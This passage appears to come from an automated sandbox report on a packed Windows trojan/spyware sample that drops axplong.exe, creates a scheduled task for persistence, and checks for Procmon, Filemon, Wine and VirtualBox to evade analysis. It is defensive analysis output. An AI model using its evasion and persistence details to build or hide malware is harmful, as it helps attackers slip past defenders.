                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00F24AF06_2_00F24AF0
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00F6765B6_2_00F6765B
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00F62BD06_2_00F62BD0
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00F6777B6_2_00F6777B
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00F687206_2_00F68720
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00F66F096_2_00F66F09
                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: file.exeStatic PE information: Section: ZLIB complexity 0.9965940054495913
                    Source: file.exeStatic PE information: Section: ibpmkgdy ZLIB complexity 0.9946698738141121
                    Source: axplong.exe.0.drStatic PE information: Section: ZLIB complexity 0.9965940054495913
                    Source: axplong.exe.0.drStatic PE information: Section: ibpmkgdy ZLIB complexity 0.9946698738141121
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/3@0/1
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeMutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\44111dbc49Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mstask.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: dui70.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: duser.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: chartv.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: atlthunk.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                    Source: file.exeStatic file information: File size 1930240 > 1048576
                    Source: file.exeStatic PE information: Raw size of ibpmkgdy is bigger than: 0x100000 < 0x1a5a00

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.ee0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ibpmkgdy:EW;kfashbkw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ibpmkgdy:EW;kfashbkw:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 1.2.axplong.exe.f20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ibpmkgdy:EW;kfashbkw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ibpmkgdy:EW;kfashbkw:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 2.2.axplong.exe.f20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ibpmkgdy:EW;kfashbkw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ibpmkgdy:EW;kfashbkw:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 6.2.axplong.exe.f20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ibpmkgdy:EW;kfashbkw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ibpmkgdy:EW;kfashbkw:EW;.taggant:EW;
                    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                    Source: axplong.exe.0.drStatic PE information: real checksum: 0x1dbe1e should be: 0x1da2c3
                    Source: file.exeStatic PE information: real checksum: 0x1dbe1e should be: 0x1da2c3
                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: .idata
                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: ibpmkgdy
                    Source: file.exeStatic PE information: section name: kfashbkw
                    Source: file.exeStatic PE information: section name: .taggant
                    Source: axplong.exe.0.drStatic PE information: section name:
                    Source: axplong.exe.0.drStatic PE information: section name: .idata
                    Source: axplong.exe.0.drStatic PE information: section name:
                    Source: axplong.exe.0.drStatic PE information: section name: ibpmkgdy
                    Source: axplong.exe.0.drStatic PE information: section name: kfashbkw
                    Source: axplong.exe.0.drStatic PE information: section name: .taggant
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00F3D84C push ecx; ret 6_2_00F3D85F
                    Source: file.exeStatic PE information: section name: entropy: 7.974553430259763
                    Source: file.exeStatic PE information: section name: ibpmkgdy entropy: 7.9543734899912995
                    Source: axplong.exe.0.drStatic PE information: section name: entropy: 7.974553430259763
                    Source: axplong.exe.0.drStatic PE information: section name: ibpmkgdy entropy: 7.9543734899912995
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeJump to dropped file

                    Boot Survival

                    barindex
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4F26F second address: F4F273 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CD93B second address: 10CD95A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F2609h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CD95A second address: 10CD95E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C69E7 second address: 10C6A11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F25FFh 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F2E044F25F6h 0x0000000f jmp 00007F2E044F2601h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C6A11 second address: 10C6A34 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a jmp 00007F2E050A57D5h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CCAB7 second address: 10CCABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CCE10 second address: 10CCE5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57D2h 0x00000007 jmp 00007F2E050A57D9h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F2E050A57D6h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 popad 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CCE5B second address: 10CCE62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CD23C second address: 10CD242 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D1343 second address: 10D134A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D13BA second address: 10D13C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push esi 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D13C5 second address: 10D13E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop esi 0x00000006 nop 0x00000007 jg 00007F2E044F25FBh 0x0000000d push 00000000h 0x0000000f cld 0x00000010 push 6A7CACACh 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 jg 00007F2E044F25F6h 0x0000001e pop eax 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D13E9 second address: 10D13FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2E050A57CDh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D153E second address: 10D156B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 4CC5C343h 0x0000000f mov edi, 481B19A5h 0x00000014 push 00000003h 0x00000016 mov ecx, dword ptr [ebp+122D2B3Dh] 0x0000001c push 00000000h 0x0000001e mov esi, edx 0x00000020 push 00000003h 0x00000022 cmc 0x00000023 push A1F63EA8h 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b push esi 0x0000002c pop esi 0x0000002d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D156B second address: 10D158B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D158B second address: 10D15B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 add dword ptr [esp], 1E09C158h 0x0000000d mov ecx, dword ptr [ebp+122D385Fh] 0x00000013 lea ebx, dword ptr [ebp+12456116h] 0x00000019 sub dword ptr [ebp+122D2748h], eax 0x0000001f xchg eax, ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D15B0 second address: 10D15B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D15B7 second address: 10D15BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F234F second address: 10F2353 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F0646 second address: 10F064A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F0814 second address: 10F081A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F0AE6 second address: 10F0AEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F0AEC second address: 10F0AF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F0C28 second address: 10F0C32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F0C32 second address: 10F0C59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57D4h 0x00000007 jmp 00007F2E050A57CFh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F0C59 second address: 10F0C6A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2E044F25FCh 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F0C6A second address: 10F0C75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edi 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F0C75 second address: 10F0C7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F0DBD second address: 10F0DC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F0DC1 second address: 10F0DF8 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F2E044F25F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F2E044F2606h 0x00000011 jmp 00007F2E044F25FDh 0x00000016 popad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a push edi 0x0000001b pop edi 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F0F83 second address: 10F0F8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F0F8B second address: 10F0F8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F10C5 second address: 10F10C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F10C9 second address: 10F10D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F2E044F25FCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F10D7 second address: 10F10DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F13CF second address: 10F13E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007F2E044F261Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F13E0 second address: 10F13E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F13E4 second address: 10F13F8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2E044F25F6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F2E044F25F6h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F13F8 second address: 10F13FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F1527 second address: 10F152B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F152B second address: 10F153B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F2E050A57CAh 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F153B second address: 10F155A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2E044F2609h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F155A second address: 10F155E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
